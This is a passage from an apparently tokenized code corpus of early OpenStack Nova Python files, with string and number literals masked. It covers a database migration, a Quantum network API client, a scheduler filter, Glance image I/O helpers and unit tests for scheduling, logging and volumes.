migrate_engine ) : <EOL> meta . 
bind = migrate_engine <EOL> instance_table = Table ( '<STR_LIT>' , meta , autoload = True , <EOL> autoload_with = migrate_engine ) <EOL> c_state = instance_table . c . state <EOL> c_state . alter ( name = '<STR_LIT>' ) <EOL> c_vm_state = instance_table . c . state_description <EOL> c_vm_state . alter ( name = '<STR_LIT>' ) <EOL> instance_table . create_column ( c_task_state ) <EOL> for old_state , values in _upgrade_translations . iteritems ( ) : <EOL> instance_table . update ( ) . values ( ** values ) . where ( c_vm_state == old_state ) . execute ( ) <EOL> def downgrade ( migrate_engine ) : <EOL> meta . bind = migrate_engine <EOL> instance_table = Table ( '<STR_LIT>' , meta , autoload = True , <EOL> autoload_with = migrate_engine ) <EOL> c_task_state = instance_table . c . task_state <EOL> c_state = instance_table . c . power_state <EOL> c_state . alter ( name = '<STR_LIT:state>' ) <EOL> c_vm_state = instance_table . c . vm_state <EOL> c_vm_state . alter ( name = '<STR_LIT>' ) <EOL> for old_vm_state , old_task_states in _downgrade_translations . iteritems ( ) : <EOL> for old_task_state , new_state_desc in old_task_states . iteritems ( ) : <EOL> instance_table . update ( ) . where ( c_task_state == old_task_state ) . where ( c_vm_state == old_vm_state ) . values ( vm_state = new_state_desc ) . execute ( ) <EOL> instance_table . drop_column ( '<STR_LIT>' ) </s>
<s> import httplib <EOL> import json <EOL> import socket <EOL> import urllib <EOL> class JSONSerializer ( object ) : <EOL> """<STR_LIT>""" <EOL> def serialize ( self , data , content_type ) : <EOL> try : <EOL> return json . dumps ( data ) <EOL> except TypeError : <EOL> pass <EOL> return json . dumps ( to_primitive ( data ) ) <EOL> def deserialize ( self , data , content_type ) : <EOL> return json . loads ( data ) <EOL> class QuantumNotFoundException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class QuantumServerException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class QuantumIOException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class api_call ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , func ) : <EOL> self . func = func <EOL> def __get__ ( self , instance , owner ) : <EOL> def with_params ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> ( format , tenant ) = ( instance . format , instance . tenant ) <EOL> if '<STR_LIT>' in kwargs : <EOL> instance . format = kwargs [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in kwargs : <EOL> instance . tenant = kwargs [ '<STR_LIT>' ] <EOL> ret = None <EOL> try : <EOL> ret = self . func ( instance , * args ) <EOL> finally : <EOL> ( instance . format , instance . tenant ) = ( format , tenant ) <EOL> return ret <EOL> return with_params <EOL> class Client ( object ) : <EOL> """<STR_LIT>""" <EOL> action_prefix = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> networks_path = "<STR_LIT>" <EOL> network_path = "<STR_LIT>" <EOL> ports_path = "<STR_LIT>" <EOL> port_path = "<STR_LIT>" <EOL> attachment_path = "<STR_LIT>" <EOL> def __init__ ( self , host = "<STR_LIT:127.0.0.1>" , port = <NUM_LIT> , use_ssl = False , tenant = None , <EOL> format = "<STR_LIT>" , testing_stub = None , key_file = None , <EOL> cert_file = None , logger = None ) : <EOL> """<STR_LIT>""" <EOL> self . host = host <EOL> self . port = port <EOL> self . use_ssl = use_ssl <EOL> self . tenant = tenant <EOL> self . 
format = format <EOL> self . connection = None <EOL> self . testing_stub = testing_stub <EOL> self . key_file = key_file <EOL> self . cert_file = cert_file <EOL> self . logger = logger <EOL> def get_connection_type ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . testing_stub : <EOL> return self . testing_stub <EOL> elif self . use_ssl : <EOL> return httplib . HTTPSConnection <EOL> else : <EOL> return httplib . HTTPConnection <EOL> def do_request ( self , method , action , body = None , <EOL> headers = None , params = None ) : <EOL> """<STR_LIT>""" <EOL> if not self . tenant : <EOL> raise Exception ( _ ( "<STR_LIT>" ) ) <EOL> action += "<STR_LIT>" % self . format <EOL> action = Client . action_prefix + action <EOL> action = action . replace ( '<STR_LIT>' , self . tenant ) <EOL> if type ( params ) is dict : <EOL> action += '<STR_LIT:?>' + urllib . urlencode ( params ) <EOL> try : <EOL> connection_type = self . get_connection_type ( ) <EOL> headers = headers or { "<STR_LIT:Content-Type>" : <EOL> "<STR_LIT>" % self . format } <EOL> certs = { '<STR_LIT>' : self . key_file , '<STR_LIT>' : self . cert_file } <EOL> certs = dict ( ( x , certs [ x ] ) for x in certs if certs [ x ] != None ) <EOL> if self . use_ssl and len ( certs ) : <EOL> c = connection_type ( self . host , self . port , ** certs ) <EOL> else : <EOL> c = connection_type ( self . host , self . port ) <EOL> if self . logger : <EOL> self . logger . debug ( <EOL> _ ( "<STR_LIT>" % <EOL> locals ( ) ) ) <EOL> if body : <EOL> self . logger . debug ( body ) <EOL> c . request ( method , action , body , headers ) <EOL> res = c . getresponse ( ) <EOL> status_code = self . get_status_code ( res ) <EOL> data = res . read ( ) <EOL> if self . logger : <EOL> self . logger . debug ( "<STR_LIT>" % ( str ( status_code ) , data ) ) <EOL> if status_code == httplib . NOT_FOUND : <EOL> raise QuantumNotFoundException ( <EOL> _ ( "<STR_LIT>" % data ) ) <EOL> if status_code in ( httplib . OK , <EOL> httplib . 
CREATED , <EOL> httplib . ACCEPTED , <EOL> httplib . NO_CONTENT ) : <EOL> if data is not None and len ( data ) : <EOL> return self . deserialize ( data , status_code ) <EOL> else : <EOL> raise QuantumServerException ( <EOL> _ ( "<STR_LIT>" <EOL> % locals ( ) ) ) <EOL> except ( socket . error , IOError ) , e : <EOL> raise QuantumIOException ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" % e ) ) <EOL> def get_status_code ( self , response ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( response , '<STR_LIT>' ) : <EOL> return response . status_int <EOL> else : <EOL> return response . status <EOL> def serialize ( self , data ) : <EOL> if not data : <EOL> return None <EOL> elif type ( data ) is dict : <EOL> return JSONSerializer ( ) . serialize ( data , self . content_type ( ) ) <EOL> else : <EOL> raise Exception ( _ ( "<STR_LIT>" % <EOL> type ( data ) ) ) <EOL> def deserialize ( self , data , status_code ) : <EOL> if status_code == <NUM_LIT> : <EOL> return data <EOL> return JSONSerializer ( ) . deserialize ( data , self . content_type ( ) ) <EOL> def content_type ( self , format = None ) : <EOL> if not format : <EOL> format = self . format <EOL> return "<STR_LIT>" % ( format ) <EOL> @ api_call <EOL> def list_networks ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . do_request ( "<STR_LIT:GET>" , self . networks_path ) <EOL> @ api_call <EOL> def show_network_details ( self , network ) : <EOL> """<STR_LIT>""" <EOL> return self . do_request ( "<STR_LIT:GET>" , self . network_path % ( network ) ) <EOL> @ api_call <EOL> def create_network ( self , body = None ) : <EOL> """<STR_LIT>""" <EOL> body = self . serialize ( body ) <EOL> return self . do_request ( "<STR_LIT:POST>" , self . networks_path , body = body ) <EOL> @ api_call <EOL> def update_network ( self , network , body = None ) : <EOL> """<STR_LIT>""" <EOL> body = self . serialize ( body ) <EOL> return self . do_request ( "<STR_LIT>" , self . 
network_path % ( network ) , body = body ) <EOL> @ api_call <EOL> def delete_network ( self , network ) : <EOL> """<STR_LIT>""" <EOL> return self . do_request ( "<STR_LIT>" , self . network_path % ( network ) ) <EOL> @ api_call <EOL> def list_ports ( self , network ) : <EOL> """<STR_LIT>""" <EOL> return self . do_request ( "<STR_LIT:GET>" , self . ports_path % ( network ) ) <EOL> @ api_call <EOL> def show_port_details ( self , network , port ) : <EOL> """<STR_LIT>""" <EOL> return self . do_request ( "<STR_LIT:GET>" , self . port_path % ( network , port ) ) <EOL> @ api_call <EOL> def create_port ( self , network , body = None ) : <EOL> """<STR_LIT>""" <EOL> body = self . serialize ( body ) <EOL> return self . do_request ( "<STR_LIT:POST>" , self . ports_path % ( network ) , body = body ) <EOL> @ api_call <EOL> def delete_port ( self , network , port ) : <EOL> """<STR_LIT>""" <EOL> return self . do_request ( "<STR_LIT>" , self . port_path % ( network , port ) ) <EOL> @ api_call <EOL> def set_port_state ( self , network , port , body = None ) : <EOL> """<STR_LIT>""" <EOL> body = self . serialize ( body ) <EOL> return self . do_request ( "<STR_LIT>" , <EOL> self . port_path % ( network , port ) , body = body ) <EOL> @ api_call <EOL> def show_port_attachment ( self , network , port ) : <EOL> """<STR_LIT>""" <EOL> return self . do_request ( "<STR_LIT:GET>" , self . attachment_path % ( network , port ) ) <EOL> @ api_call <EOL> def attach_resource ( self , network , port , body = None ) : <EOL> """<STR_LIT>""" <EOL> body = self . serialize ( body ) <EOL> return self . do_request ( "<STR_LIT>" , <EOL> self . attachment_path % ( network , port ) , body = body ) <EOL> @ api_call <EOL> def detach_resource ( self , network , port ) : <EOL> """<STR_LIT>""" <EOL> return self . do_request ( "<STR_LIT>" , <EOL> self . attachment_path % ( network , port ) ) </s>
<s> import nova . scheduler <EOL> from nova . scheduler . filters import abstract_filter <EOL> class AllHostsFilter ( abstract_filter . AbstractHostFilter ) : <EOL> """<STR_LIT>""" <EOL> def instance_type_to_filter ( self , instance_type ) : <EOL> """<STR_LIT>""" <EOL> return ( self . _full_name ( ) , instance_type ) <EOL> def filter_hosts ( self , zone_manager , query ) : <EOL> """<STR_LIT>""" <EOL> return [ ( host , services ) <EOL> for host , services in zone_manager . service_states . iteritems ( ) ] </s>
<s> import datetime <EOL> import json <EOL> import webob <EOL> import nova <EOL> from nova import context <EOL> from nova import test <EOL> from nova . api . openstack . contrib . volumes import BootFromVolumeController <EOL> from nova . compute import instance_types <EOL> from nova . tests . api . openstack import fakes <EOL> from nova . tests . api . openstack . test_servers import fake_gen_uuid <EOL> def fake_compute_api_create ( cls , context , instance_type , image_href , ** kwargs ) : <EOL> inst_type = instance_types . get_instance_type_by_flavor_id ( <NUM_LIT:2> ) <EOL> return [ { '<STR_LIT:id>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fake_gen_uuid ( ) , <EOL> '<STR_LIT>' : dict ( inst_type ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : datetime . datetime ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:10> , <NUM_LIT:12> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : datetime . datetime ( <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT:11> , <NUM_LIT:11> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> } ] <EOL> class BootFromVolumeTest ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( BootFromVolumeTest , self ) . setUp ( ) <EOL> self . stubs . Set ( nova . compute . API , '<STR_LIT>' , fake_compute_api_create ) <EOL> def test_create_root_volume ( self ) : <EOL> body = dict ( server = dict ( <EOL> name = '<STR_LIT>' , imageRef = <NUM_LIT:3> , <EOL> flavorRef = <NUM_LIT:2> , min_count = <NUM_LIT:1> , max_count = <NUM_LIT:1> , <EOL> block_device_mapping = [ dict ( <EOL> volume_id = <NUM_LIT:1> , <EOL> device_name = '<STR_LIT>' , <EOL> virtual = '<STR_LIT:root>' , <EOL> delete_on_termination = False , <EOL> ) ] <EOL> ) ) <EOL> req = webob . Request . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT:POST>' <EOL> req . body = json . dumps ( body ) <EOL> req . 
headers [ '<STR_LIT>' ] = '<STR_LIT:application/json>' <EOL> res = req . get_response ( fakes . wsgi_app ( ) ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> server = json . loads ( res . body ) [ '<STR_LIT>' ] <EOL> self . assertEqual ( <NUM_LIT:1> , server [ '<STR_LIT:id>' ] ) <EOL> self . assertEqual ( <NUM_LIT:2> , int ( server [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) ) <EOL> self . assertEqual ( u'<STR_LIT>' , server [ '<STR_LIT:name>' ] ) <EOL> self . assertEqual ( <NUM_LIT:3> , int ( server [ '<STR_LIT:image>' ] [ '<STR_LIT:id>' ] ) ) <EOL> self . assertEqual ( <NUM_LIT:16> , len ( server [ '<STR_LIT>' ] ) ) </s>
<s> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> import copy <EOL> from nova import test <EOL> from nova . scheduler import least_cost <EOL> from nova . tests . scheduler import test_abstract_scheduler <EOL> MB = <NUM_LIT> * <NUM_LIT> <EOL> class FakeHost ( object ) : <EOL> def __init__ ( self , host_id , free_ram , io ) : <EOL> self . id = host_id <EOL> self . free_ram = free_ram <EOL> self . io = io <EOL> class WeightedSumTestCase ( test . TestCase ) : <EOL> def test_empty_domain ( self ) : <EOL> domain = [ ] <EOL> weighted_fns = [ ] <EOL> result = least_cost . weighted_sum ( domain , weighted_fns ) <EOL> expected = [ ] <EOL> self . assertEqual ( expected , result ) <EOL> def test_basic_costing ( self ) : <EOL> hosts = [ <EOL> FakeHost ( <NUM_LIT:1> , <NUM_LIT> * MB , <NUM_LIT:100> ) , <EOL> FakeHost ( <NUM_LIT:2> , <NUM_LIT> * MB , <NUM_LIT> ) , <EOL> FakeHost ( <NUM_LIT:3> , <NUM_LIT> * MB , <NUM_LIT:100> ) , <EOL> ] <EOL> weighted_fns = [ <EOL> ( <NUM_LIT:1> , lambda h : h . free_ram ) , <EOL> ( <NUM_LIT:2> , lambda h : h . io ) , <EOL> ] <EOL> costs = least_cost . weighted_sum ( <EOL> domain = hosts , weighted_fns = weighted_fns ) <EOL> expected = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> self . assertEqual ( expected , costs ) <EOL> class LeastCostSchedulerTestCase ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( LeastCostSchedulerTestCase , self ) . setUp ( ) <EOL> class FakeZoneManager : <EOL> pass <EOL> zone_manager = FakeZoneManager ( ) <EOL> states = test_abstract_scheduler . fake_zone_manager_service_states ( <EOL> num_hosts = <NUM_LIT:10> ) <EOL> zone_manager . service_states = states <EOL> self . sched = least_cost . LeastCostScheduler ( ) <EOL> self . sched . zone_manager = zone_manager <EOL> def tearDown ( self ) : <EOL> super ( LeastCostSchedulerTestCase , self ) . tearDown ( ) <EOL> def assertWeights ( self , expected , num , request_spec , hosts ) : <EOL> weighted = self . sched . weigh_hosts ( "<STR_LIT>" , request_spec , hosts ) <EOL> self . 
assertDictListMatch ( weighted , expected , approx_equal = True ) <EOL> def test_no_hosts ( self ) : <EOL> num = <NUM_LIT:1> <EOL> request_spec = { } <EOL> hosts = [ ] <EOL> expected = [ ] <EOL> self . assertWeights ( expected , num , request_spec , hosts ) <EOL> def test_noop_cost_fn ( self ) : <EOL> self . flags ( least_cost_scheduler_cost_functions = [ <EOL> '<STR_LIT>' ] , <EOL> noop_cost_fn_weight = <NUM_LIT:1> ) <EOL> num = <NUM_LIT:1> <EOL> request_spec = { } <EOL> hosts = self . sched . filter_hosts ( num , request_spec ) <EOL> expected = [ dict ( weight = <NUM_LIT:1> , hostname = hostname ) <EOL> for hostname , caps in hosts ] <EOL> self . assertWeights ( expected , num , request_spec , hosts ) <EOL> def test_cost_fn_weights ( self ) : <EOL> self . flags ( least_cost_scheduler_cost_functions = [ <EOL> '<STR_LIT>' ] , <EOL> noop_cost_fn_weight = <NUM_LIT:2> ) <EOL> num = <NUM_LIT:1> <EOL> request_spec = { } <EOL> hosts = self . sched . filter_hosts ( num , request_spec ) <EOL> expected = [ dict ( weight = <NUM_LIT:2> , hostname = hostname ) <EOL> for hostname , caps in hosts ] <EOL> self . assertWeights ( expected , num , request_spec , hosts ) <EOL> def test_compute_fill_first_cost_fn ( self ) : <EOL> self . flags ( least_cost_scheduler_cost_functions = [ <EOL> '<STR_LIT>' ] , <EOL> compute_fill_first_cost_fn_weight = <NUM_LIT:1> ) <EOL> num = <NUM_LIT:1> <EOL> instance_type = { '<STR_LIT>' : <NUM_LIT> } <EOL> request_spec = { '<STR_LIT>' : instance_type } <EOL> svc_states = self . sched . zone_manager . service_states . iteritems ( ) <EOL> all_hosts = [ ( host , services [ "<STR_LIT>" ] ) <EOL> for host , services in svc_states <EOL> if "<STR_LIT>" in services ] <EOL> hosts = self . sched . filter_hosts ( '<STR_LIT>' , request_spec , all_hosts ) <EOL> expected = [ ] <EOL> for idx , ( hostname , services ) in enumerate ( hosts ) : <EOL> caps = copy . 
deepcopy ( services [ "<STR_LIT>" ] ) <EOL> weight = <NUM_LIT:0.1> + ( <NUM_LIT:0.1> * idx ) <EOL> wtd_dict = dict ( hostname = hostname , weight = weight , <EOL> capabilities = caps ) <EOL> expected . append ( wtd_dict ) <EOL> self . assertWeights ( expected , num , request_spec , hosts ) </s>
<s> import cStringIO <EOL> from nova import context <EOL> from nova import flags <EOL> from nova import log <EOL> from nova import test <EOL> FLAGS = flags . FLAGS <EOL> def _fake_context ( ) : <EOL> return context . RequestContext ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> class RootLoggerTestCase ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( RootLoggerTestCase , self ) . setUp ( ) <EOL> self . log = log . logging . root <EOL> def test_is_nova_instance ( self ) : <EOL> self . assert_ ( isinstance ( self . log , log . NovaLogger ) ) <EOL> def test_name_is_nova ( self ) : <EOL> self . assertEqual ( "<STR_LIT>" , self . log . name ) <EOL> def test_handlers_have_nova_formatter ( self ) : <EOL> formatters = [ ] <EOL> for h in self . log . handlers : <EOL> f = h . formatter <EOL> if isinstance ( f , log . NovaFormatter ) : <EOL> formatters . append ( f ) <EOL> self . assert_ ( formatters ) <EOL> self . assertEqual ( len ( formatters ) , len ( self . log . handlers ) ) <EOL> def test_handles_context_kwarg ( self ) : <EOL> self . log . info ( "<STR_LIT:foo>" , context = _fake_context ( ) ) <EOL> self . assert_ ( True ) <EOL> def test_module_level_methods_handle_context_arg ( self ) : <EOL> log . info ( "<STR_LIT:foo>" , context = _fake_context ( ) ) <EOL> self . assert_ ( True ) <EOL> def test_module_level_audit_handles_context_arg ( self ) : <EOL> log . audit ( "<STR_LIT:foo>" , context = _fake_context ( ) ) <EOL> self . assert_ ( True ) <EOL> def test_will_be_verbose_if_verbose_flag_set ( self ) : <EOL> self . flags ( verbose = True ) <EOL> log . reset ( ) <EOL> self . assertEqual ( log . DEBUG , self . log . level ) <EOL> def test_will_not_be_verbose_if_verbose_flag_not_set ( self ) : <EOL> self . flags ( verbose = False ) <EOL> log . reset ( ) <EOL> self . assertEqual ( log . INFO , self . log . level ) <EOL> class LogHandlerTestCase ( test . TestCase ) : <EOL> def test_log_path_logdir ( self ) : <EOL> self . 
flags ( logdir = '<STR_LIT>' , logfile = None ) <EOL> self . assertEquals ( log . _get_log_file_path ( binary = '<STR_LIT>' ) , <EOL> '<STR_LIT>' ) <EOL> def test_log_path_logfile ( self ) : <EOL> self . flags ( logfile = '<STR_LIT>' ) <EOL> self . assertEquals ( log . _get_log_file_path ( binary = '<STR_LIT>' ) , <EOL> '<STR_LIT>' ) <EOL> def test_log_path_none ( self ) : <EOL> self . flags ( logdir = None , logfile = None ) <EOL> self . assertTrue ( log . _get_log_file_path ( binary = '<STR_LIT>' ) is None ) <EOL> def test_log_path_logfile_overrides_logdir ( self ) : <EOL> self . flags ( logdir = '<STR_LIT>' , <EOL> logfile = '<STR_LIT>' ) <EOL> self . assertEquals ( log . _get_log_file_path ( binary = '<STR_LIT>' ) , <EOL> '<STR_LIT>' ) <EOL> class NovaFormatterTestCase ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( NovaFormatterTestCase , self ) . setUp ( ) <EOL> self . flags ( logging_context_format_string = "<STR_LIT>" "<STR_LIT>" , <EOL> logging_default_format_string = "<STR_LIT>" , <EOL> logging_debug_format_suffix = "<STR_LIT>" ) <EOL> self . log = log . logging . root <EOL> self . stream = cStringIO . StringIO ( ) <EOL> self . handler = log . StreamHandler ( self . stream ) <EOL> self . log . addHandler ( self . handler ) <EOL> self . level = self . log . level <EOL> self . log . setLevel ( log . DEBUG ) <EOL> def tearDown ( self ) : <EOL> self . log . setLevel ( self . level ) <EOL> self . log . removeHandler ( self . handler ) <EOL> super ( NovaFormatterTestCase , self ) . tearDown ( ) <EOL> def test_uncontextualized_log ( self ) : <EOL> self . log . info ( "<STR_LIT:foo>" ) <EOL> self . assertEqual ( "<STR_LIT>" , self . stream . getvalue ( ) ) <EOL> def test_contextualized_log ( self ) : <EOL> ctxt = _fake_context ( ) <EOL> self . log . info ( "<STR_LIT:bar>" , context = ctxt ) <EOL> expected = "<STR_LIT>" % ctxt . request_id <EOL> self . assertEqual ( expected , self . stream . 
getvalue ( ) ) <EOL> def test_debugging_log ( self ) : <EOL> self . log . debug ( "<STR_LIT>" ) <EOL> self . assertEqual ( "<STR_LIT>" , self . stream . getvalue ( ) ) <EOL> class NovaLoggerTestCase ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( NovaLoggerTestCase , self ) . setUp ( ) <EOL> levels = FLAGS . default_log_levels <EOL> levels . append ( "<STR_LIT>" ) <EOL> self . flags ( default_log_levels = levels , <EOL> verbose = True ) <EOL> self . log = log . getLogger ( '<STR_LIT>' ) <EOL> def test_has_level_from_flags ( self ) : <EOL> self . assertEqual ( log . AUDIT , self . log . level ) <EOL> def test_child_log_has_level_of_parent_flag ( self ) : <EOL> l = log . getLogger ( '<STR_LIT>' ) <EOL> self . assertEqual ( log . AUDIT , l . level ) </s>
<s> import stubout <EOL> from nova import exception <EOL> from nova import flags <EOL> from nova import vsa <EOL> from nova import volume <EOL> from nova import db <EOL> from nova import context <EOL> from nova import test <EOL> from nova import log as logging <EOL> import nova . image . fake <EOL> FLAGS = flags . FLAGS <EOL> LOG = logging . getLogger ( '<STR_LIT>' ) <EOL> class VsaVolumesTestCase ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( VsaVolumesTestCase , self ) . setUp ( ) <EOL> self . stubs = stubout . StubOutForTesting ( ) <EOL> self . vsa_api = vsa . API ( ) <EOL> self . volume_api = volume . API ( ) <EOL> self . context = context . get_admin_context ( ) <EOL> self . default_vol_type = self . vsa_api . get_vsa_volume_type ( self . context ) <EOL> def fake_show_by_name ( meh , context , name ) : <EOL> return { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } } <EOL> self . stubs . Set ( nova . image . fake . _FakeImageService , <EOL> '<STR_LIT>' , <EOL> fake_show_by_name ) <EOL> param = { '<STR_LIT>' : '<STR_LIT>' } <EOL> vsa_ref = self . vsa_api . create ( self . context , ** param ) <EOL> self . vsa_id = vsa_ref [ '<STR_LIT:id>' ] <EOL> def tearDown ( self ) : <EOL> if self . vsa_id : <EOL> self . vsa_api . delete ( self . context , self . vsa_id ) <EOL> self . stubs . UnsetAll ( ) <EOL> super ( VsaVolumesTestCase , self ) . tearDown ( ) <EOL> def _default_volume_param ( self ) : <EOL> return { <EOL> '<STR_LIT:size>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . default_vol_type , <EOL> '<STR_LIT>' : { '<STR_LIT>' : self . vsa_id } <EOL> } <EOL> def _get_all_volumes_by_vsa ( self ) : <EOL> return self . volume_api . get_all ( self . context , <EOL> search_opts = { '<STR_LIT>' : { "<STR_LIT>" : str ( self . 
vsa_id ) } } ) <EOL> def test_vsa_volume_create_delete ( self ) : <EOL> """<STR_LIT>""" <EOL> volume_param = self . _default_volume_param ( ) <EOL> volume_ref = self . volume_api . create ( self . context , ** volume_param ) <EOL> self . assertEqual ( volume_ref [ '<STR_LIT>' ] , <EOL> volume_param [ '<STR_LIT:name>' ] ) <EOL> self . assertEqual ( volume_ref [ '<STR_LIT>' ] , <EOL> volume_param [ '<STR_LIT:description>' ] ) <EOL> self . assertEqual ( volume_ref [ '<STR_LIT:size>' ] , <EOL> volume_param [ '<STR_LIT:size>' ] ) <EOL> self . assertEqual ( volume_ref [ '<STR_LIT:status>' ] , <EOL> '<STR_LIT>' ) <EOL> vols2 = self . _get_all_volumes_by_vsa ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( vols2 ) ) <EOL> volume_ref = vols2 [ <NUM_LIT:0> ] <EOL> self . assertEqual ( volume_ref [ '<STR_LIT>' ] , <EOL> volume_param [ '<STR_LIT:name>' ] ) <EOL> self . assertEqual ( volume_ref [ '<STR_LIT>' ] , <EOL> volume_param [ '<STR_LIT:description>' ] ) <EOL> self . assertEqual ( volume_ref [ '<STR_LIT:size>' ] , <EOL> volume_param [ '<STR_LIT:size>' ] ) <EOL> self . assertEqual ( volume_ref [ '<STR_LIT:status>' ] , <EOL> '<STR_LIT>' ) <EOL> self . volume_api . update ( self . context , <EOL> volume_ref [ '<STR_LIT:id>' ] , { '<STR_LIT:status>' : '<STR_LIT>' } ) <EOL> self . volume_api . delete ( self . context , volume_ref [ '<STR_LIT:id>' ] ) <EOL> vols3 = self . _get_all_volumes_by_vsa ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( vols2 ) ) <EOL> volume_ref = vols3 [ <NUM_LIT:0> ] <EOL> self . assertEqual ( volume_ref [ '<STR_LIT:status>' ] , <EOL> '<STR_LIT>' ) <EOL> def test_vsa_volume_delete_nonavail_volume ( self ) : <EOL> """<STR_LIT>""" <EOL> volume_param = self . _default_volume_param ( ) <EOL> volume_ref = self . volume_api . create ( self . context , ** volume_param ) <EOL> self . volume_api . update ( self . context , <EOL> volume_ref [ '<STR_LIT:id>' ] , { '<STR_LIT:status>' : '<STR_LIT>' } ) <EOL> self . assertRaises ( exception . 
ApiError , <EOL> self . volume_api . delete , <EOL> self . context , volume_ref [ '<STR_LIT:id>' ] ) <EOL> def test_vsa_volume_delete_vsa_with_volumes ( self ) : <EOL> """<STR_LIT>""" <EOL> vols1 = self . _get_all_volumes_by_vsa ( ) <EOL> for i in range ( <NUM_LIT:3> ) : <EOL> volume_param = self . _default_volume_param ( ) <EOL> volume_ref = self . volume_api . create ( self . context , ** volume_param ) <EOL> vols2 = self . _get_all_volumes_by_vsa ( ) <EOL> self . assertEqual ( len ( vols1 ) + <NUM_LIT:3> , len ( vols2 ) ) <EOL> self . vsa_api . delete ( self . context , self . vsa_id ) <EOL> vols3 = self . _get_all_volumes_by_vsa ( ) <EOL> self . assertEqual ( len ( vols1 ) , len ( vols3 ) ) </s>
<s> """<STR_LIT>""" <EOL> from eventlet import event <EOL> from eventlet import greenthread <EOL> from eventlet . queue import LightQueue <EOL> from glance import client <EOL> from nova import exception <EOL> from nova import log as logging <EOL> LOG = logging . getLogger ( "<STR_LIT>" ) <EOL> IO_THREAD_SLEEP_TIME = <NUM_LIT> <EOL> GLANCE_POLL_INTERVAL = <NUM_LIT:5> <EOL> class ThreadSafePipe ( LightQueue ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , maxsize , transfer_size ) : <EOL> LightQueue . __init__ ( self , maxsize ) <EOL> self . transfer_size = transfer_size <EOL> self . transferred = <NUM_LIT:0> <EOL> def read ( self , chunk_size ) : <EOL> """<STR_LIT>""" <EOL> if self . transferred < self . transfer_size : <EOL> data_item = self . get ( ) <EOL> self . transferred += len ( data_item ) <EOL> return data_item <EOL> else : <EOL> return "<STR_LIT>" <EOL> def write ( self , data ) : <EOL> """<STR_LIT>""" <EOL> self . put ( data ) <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class GlanceWriteThread ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , input , glance_client , image_id , image_meta = None ) : <EOL> if not image_meta : <EOL> image_meta = { } <EOL> self . input = input <EOL> self . glance_client = glance_client <EOL> self . image_id = image_id <EOL> self . image_meta = image_meta <EOL> self . _running = False <EOL> def start ( self ) : <EOL> self . done = event . Event ( ) <EOL> def _inner ( ) : <EOL> """<STR_LIT>""" <EOL> self . glance_client . update_image ( self . image_id , <EOL> image_meta = self . image_meta , <EOL> image_data = self . input ) <EOL> self . _running = True <EOL> while self . _running : <EOL> try : <EOL> image_status = self . glance_client . get_image_meta ( self . image_id ) . get ( <EOL> "<STR_LIT:status>" ) <EOL> if image_status == "<STR_LIT>" : <EOL> self . stop ( ) <EOL> self . done . send ( True ) <EOL> elif image_status == "<STR_LIT>" : <EOL> self . 
stop ( ) <EOL> exc_msg = _ ( "<STR_LIT>" ) % self . image_id <EOL> LOG . exception ( exc_msg ) <EOL> self . done . send_exception ( exception . Error ( exc_msg ) ) <EOL> elif image_status in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> greenthread . sleep ( GLANCE_POLL_INTERVAL ) <EOL> else : <EOL> self . stop ( ) <EOL> exc_msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) % { <EOL> "<STR_LIT>" : self . image_id , <EOL> "<STR_LIT:state>" : image_status } <EOL> LOG . exception ( exc_msg ) <EOL> self . done . send_exception ( exception . Error ( exc_msg ) ) <EOL> except Exception , exc : <EOL> self . stop ( ) <EOL> self . done . send_exception ( exc ) <EOL> greenthread . spawn ( _inner ) <EOL> return self . done <EOL> def stop ( self ) : <EOL> self . _running = False <EOL> def wait ( self ) : <EOL> return self . done . wait ( ) <EOL> def close ( self ) : <EOL> pass <EOL> class IOThread ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , input , output ) : <EOL> self . input = input <EOL> self . output = output <EOL> self . _running = False <EOL> 